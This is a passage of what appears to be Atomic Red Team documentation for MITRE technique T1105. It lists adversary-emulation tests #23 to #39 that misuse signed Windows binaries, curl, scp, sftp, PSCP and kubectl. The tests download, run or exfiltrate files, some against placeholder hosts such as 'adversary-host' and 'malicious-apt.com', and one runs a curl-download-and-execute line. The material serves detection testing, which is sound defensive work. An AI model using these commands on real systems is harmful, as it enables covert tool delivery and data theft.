**auto_generated_guid:** 54782d65-12f0-47a5-b4c1-b70ee23de6df





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| replace_cab | Path to the cab file | path | PathToAtomicsFolder&#92;T1105&#92;src&#92;redcanary.cab|
| Path_replace | Path to replace.exe | path | C:&#92;Windows&#92;System32&#92;replace.exe|


#### Attack Commands: Run with `command_prompt`! 


```cmd
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A
```

#### Cleanup Commands:
```cmd
del %TEMP%\redcanary.cab >nul 2>&1
```



#### Dependencies:  Run with `powershell`!
##### Description: #{replace_cab} must exist on system.
##### Check Prereq Commands:
```powershell
if (Test-Path "#{replace_cab}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
```




<br/>
<br/>

## Atomic Test #24 - Lolbas replace.exe use to copy UNC file
Copy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/

**Supported Platforms:** Windows


**auto_generated_guid:** ed0335ac-0354-400c-8148-f6151d20035a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| replace_cab | UNC Path to the cab file | path | &#92;&#92;127.0.0.1&#92;c$&#92;AtomicRedTeam&#92;atomics&#92;T1105&#92;src&#92;redcanary.cab|
| Path_replace | Path to replace.exe | path | C:&#92;Windows&#92;System32&#92;replace.exe|


#### Attack Commands: Run with `command_prompt`! 


```cmd
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A
```

#### Cleanup Commands:
```cmd
del %TEMP%\redcanary.cab >nul 2>&1
```





<br/>
<br/>

## Atomic Test #25 - certreq download
Use certreq to download a file from the web

**Supported Platforms:** Windows


**auto_generated_guid:** 6fdaae87-c05b-42f8-842e-991a74e8376b





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_path | Local path to place file | string | %temp%&#92;Atomic-license.txt|
| remote_file | URL of file to copy | url | https://example.com|


#### Attack Commands: Run with `command_prompt`! 


```cmd
certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
```

#### Cleanup Commands:
```cmd
del #{local_path} >nul 2>&1
```





<br/>
<br/>

## Atomic Test #26 - Download a file using wscript
Use wscript to run a local VisualBasic file to download a remote file

**Supported Platforms:** Windows


**auto_generated_guid:** 97116a3f-efac-4b26-8336-b9cb18c45188





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vbscript_file | Full path to the VisualBasic downloading the file | string | PathToAtomicsFolder&#92;T1105&#92;src&#92;T1105-download-file.vbs|


#### Attack Commands: Run with `command_prompt`! 


```cmd
wscript.exe "#{vbscript_file}"
```

#### Cleanup Commands:
```cmd
del Atomic-License.txt >nul 2>&1
```



#### Dependencies:  Run with `powershell`!
##### Description: #{vbscript_file} must be exist on system.
##### Check Prereq Commands:
```powershell
if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
```




<br/>
<br/>

## Atomic Test #27 - Linux Download File and Run
Utilize linux Curl to download a remote file, chmod +x it and run it.

**Supported Platforms:** Linux


**auto_generated_guid:** bdc373c5-e9cf-4563-8a7b-a9ba720a90f3





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url of remote payload | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh|
| payload_name | payload name | string | atomic.sh|


#### Attack Commands: Run with `sh`! 


```sh
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
```

#### Cleanup Commands:
```sh
rm #{payload_name}
```





<br/>
<br/>

## Atomic Test #28 - Nimgrab - Transfer Files
Use nimgrab.exe to download a file from the web.

**Supported Platforms:** Windows


**auto_generated_guid:** b1729c57-9384-4d1c-9b99-9b220afb384e





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| destination_path | Destination path to file | path | $env:TEMP&#92;Atomic-license.txt|


#### Attack Commands: Run with `command_prompt`! 


```cmd
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
```

#### Cleanup Commands:
```cmd
del #{destination_path} >nul 2>&1
```



#### Dependencies:  Run with `powershell`!
##### Description: NimGrab must be installed on system.
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"
```




<br/>
<br/>

## Atomic Test #29 - iwr or Invoke Web-Request download
Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.

**Supported Platforms:** Windows


**auto_generated_guid:** c01cad7f-7a4c-49df-985e-b190dcf6a279





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | path | %temp%&#92;Atomic-license.txt|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
```

#### Cleanup Commands:
```cmd
del %temp%\Atomic-license.txt >nul 2>&1
```





<br/>
<br/>

## Atomic Test #30 - Arbitrary file download using the Notepad++ GUP.exe binary
GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github.
[Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder

**Supported Platforms:** Windows


**auto_generated_guid:** 66ee226e-64cb-4dae-80e3-5bf5763e4a51





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_file_url | URL of the target ZIP file (Eg: https://example.com/test.zip) | url | https://getsamplefiles.com/download/zip/sample-2.zip|
| working_dir | The directory where GUP.exe & it's dependecies exists | path | PathToAtomicsFolder&#92;T1105&#92;bin&#92;|
| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | String | PathToAtomicsFolder&#92;T1105&#92;bin&#92;GUP.exe|
| target_file_sha256 | SHA256 value of target ZIP file | string | CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
```

#### Cleanup Commands:
```cmd
rmdir /s /q "C:\Temp\Sample" >nul 2>nul
```



#### Dependencies:  Run with `powershell`!
##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
```




<br/>
<br/>

## Atomic Test #31 - File download via nscurl
Use nscurl to download and write a file/payload from the internet.
-k = Disable certificate checking
-o = Output destination

**Supported Platforms:** macOS


**auto_generated_guid:** 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| destination_path | Local path to place remote file | path | license.txt|


#### Attack Commands: Run with `sh`! 


```sh
nscurl -k "#{remote_file}" -o "#{destination_path}"
```

#### Cleanup Commands:
```sh
rm "#{destination_path}"
```





<br/>
<br/>

## Atomic Test #32 - File Download with Sqlcmd.exe
One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers
This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL

**Supported Platforms:** Windows


**auto_generated_guid:** 6934c16e-0b3a-4e7f-ab8c-c414acd32181





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | URL of the C2 Server from where file/s need to be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip|
| local_file_path | The local file path along with filename to where the file needs to be downloaded and placed. | path | C:&#92;T1105.zip|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
sqlcmd -i #{remote_url} -o #{local_file_path}
```

#### Cleanup Commands:
```powershell
rm "#{local_file_path}" 2>$null | Out-Null
```



#### Dependencies:  Run with `powershell`!
##### Description: Windows package 'Sqlcmd' need to be available in the machine to execute this atomic successfully
##### Check Prereq Commands:
```powershell
if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
```




<br/>
<br/>

## Atomic Test #33 - Remote File Copy using PSCP
Copy a staged file using PSCP.exe to a public target location.

**Supported Platforms:** Windows


**auto_generated_guid:** c82b1e60-c549-406f-9b00-0a8ae31c9cfe





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pscp_url | pscp.exe download path | string | https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe|
| pscp_binary | PSCP binary location | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pscp.exe|
| scp_user | Username of the SCP user | string | atomic|
| scp_password | Password for the SCP User | string | atomic|
| scp_port | port for the remote server | string | 22|
| exfil_package | path to exfil package | path | C:&#92;Temp&#92;T1105_scp.zip|
| target_location | Remote location where the data will be copied to. | string | 127.0.0.1|
| target_filename | Filename on the destination. | string | T1105_scp.zip|


#### Attack Commands: Run with `command_prompt`! 


```cmd
fsutil file createnew C:\Temp\T1105_scp.zip 1048576
echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
```

#### Cleanup Commands:
```cmd
del /f /q #{exfil_package}
```



#### Dependencies:  Run with `powershell`!
##### Description: pscp.exe must be available on the system.
##### Check Prereq Commands:
```powershell
if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
```




<br/>
<br/>

## Atomic Test #34 - Windows push file using scp.exe
This test simulates pushing files using SCP on a Windows environment.

**Supported Platforms:** Windows


**auto_generated_guid:** 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | path | /tmp/|
| remote_host | Remote host to send | string | adversary-host|
| local_path | Local path to copy from | path | C:&#92;temp|
| file_name | Name of the file to transfer | string | T1105.txt|
| username | User account to authenticate on remote host | string | adversary|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
    New-Item -Path $folderPath -ItemType Directory
}

# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"

# Attack command
scp.exe #{local_path}\#{file_name} #{username}@#{remote_host}:#{remote_path}
```

#### Cleanup Commands:
```powershell
$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force -erroraction silentlycontinue
Write-Output "File deleted: $filePath"
```



#### Dependencies:  Run with `powershell`!
##### Description: This test requires the `scp` command to be available on the system.
##### Check Prereq Commands:
```powershell
if (Get-Command scp -ErrorAction SilentlyContinue) {
    Write-Output "SCP command is available."
    exit 0
} else {
    Write-Output "SCP command is not available."
    exit 1
}
```
##### Get Prereq Commands:
```powershell
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
```




<br/>
<br/>

## Atomic Test #35 - Windows pull file using scp.exe
This test simulates pulling files using SCP on a Windows environment.

**Supported Platforms:** Windows


**auto_generated_guid:** 401667dc-05a6-4da0-a2a7-acfe4819559c





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to pull | path | /tmp/T1105.txt|
| remote_host | Remote host to pull from | string | adversary-host|
| local_path | Local path to receive files | path | C:&#92;temp|
| username | User account to authenticate on remote host | string | adversary|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
```




#### Dependencies:  Run with `powershell`!
##### Description: This test requires the `scp` command to be available on the system.
##### Check Prereq Commands:
```powershell
if (Get-Command scp -ErrorAction SilentlyContinue) {
    Write-Output "SCP command is available."
    exit 0
} else {
    Write-Output "SCP command is not available."
    exit 1
}
```
##### Get Prereq Commands:
```powershell
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
```




<br/>
<br/>

## Atomic Test #36 - Windows push file using sftp.exe
This test simulates pushing files using SFTP on a Windows environment.

**Supported Platforms:** Windows


**auto_generated_guid:** 205e676e-0401-4bae-83a5-94b8c5daeb22





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | path | /tmp|
| remote_host | Remote host to send | string | adversary-host|
| local_path | Local path to receive sftp | path | C:&#92;temp|
| file_name | Name of the file to transfer | string | T1105.txt|
| username | User account to authenticate on remote host | string | adversary|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
    New-Item -Path $folderPath -ItemType Directory
}
# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"
# Attack command
echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path}
```

#### Cleanup Commands:
```powershell
$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force
Write-Output "File deleted: $filePath"
```



#### Dependencies:  Run with `powershell`!
##### Description: This test requires the `sftp` command to be available on the system.
##### Check Prereq Commands:
```powershell
if (Get-Command sftp -ErrorAction SilentlyContinue) {
    Write-Output "SFTP command is available."
    exit 0
} else {
    Write-Output "SFTP command is not available."
    exit 1
}
```
##### Get Prereq Commands:
```powershell
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
```




<br/>
<br/>

## Atomic Test #37 - Windows pull file using sftp.exe
This test simulates pulling files using SFTP on a Windows environment.

**Supported Platforms:** Windows


**auto_generated_guid:** 3d25f1f2-55cb-4a41-a523-d17ad4cfba19





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of file to pull | path | /tmp/T1105.txt|
| remote_host | Remote host to pull from | string | adversary-host|
| local_path | Local path to receive files | path | C:&#92;temp|
| username | User account to authenticate on remote host | string | adversary|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
```




#### Dependencies:  Run with `powershell`!
##### Description: This test requires the `sftp` command to be available on the system.
##### Check Prereq Commands:
```powershell
if (Get-Command sftp -ErrorAction SilentlyContinue) {
    Write-Output "SFTP command is available."
    exit 0
} else {
    Write-Output "SFTP command is not available."
    exit 1
}
```
##### Get Prereq Commands:
```powershell
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}
```




<br/>
<br/>

## Atomic Test #38 - Download a file with OneDrive Standalone Updater
Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
This technique can be used to download files without executing anomalous executables.
Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/

**Supported Platforms:** Windows


**auto_generated_guid:** 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | URL to download file from | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| onedrive_path | Path to OneDrive Standalone Updater executable | path | C:&#92;Users&#92;$env:USERNAME&#92;AppData&#92;Local&#92;Microsoft&#92;OneDrive&#92;OneDriveStandaloneUpdater.exe|


#### Attack Commands: Run with `powershell`! 


```powershell
if (-not (Test-Path "#{onedrive_path}")) {
    Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
    exit 1
}

New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force

# Run OneDrive Standalone Updater
& "#{onedrive_path}"
```

#### Cleanup Commands:
```powershell
Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
```



#### Dependencies:  Run with `powershell`!
##### Description: OneDriveStandaloneUpdater.exe must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path."
```




<br/>
<br/>

## Atomic Test #39 - Curl Insecure Connection from a Pod
Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
against a target URL. The pod is automatically deleted after execution.

**Supported Platforms:** Containers


**auto_generated_guid:** 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pod_name | K8s pod_name to execute the command in | string | atomic-insecure-curl|
| remote_url | Remote URL to curl | string | https://malicious-apt.com|
| image_name | Name of the docker image | string | curlimages/curl|


#### Attack Commands: Run with `bash`! 


```bash
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
```




#### Dependencies:  Run with `bash`!
##### Description: kubectl must be installed and configured
##### Check Prereq Commands:
```bash
which kubectl
```
##### Get Prereq Commands:
```bash
echo "kubectl must be installed manually"
```




<br/>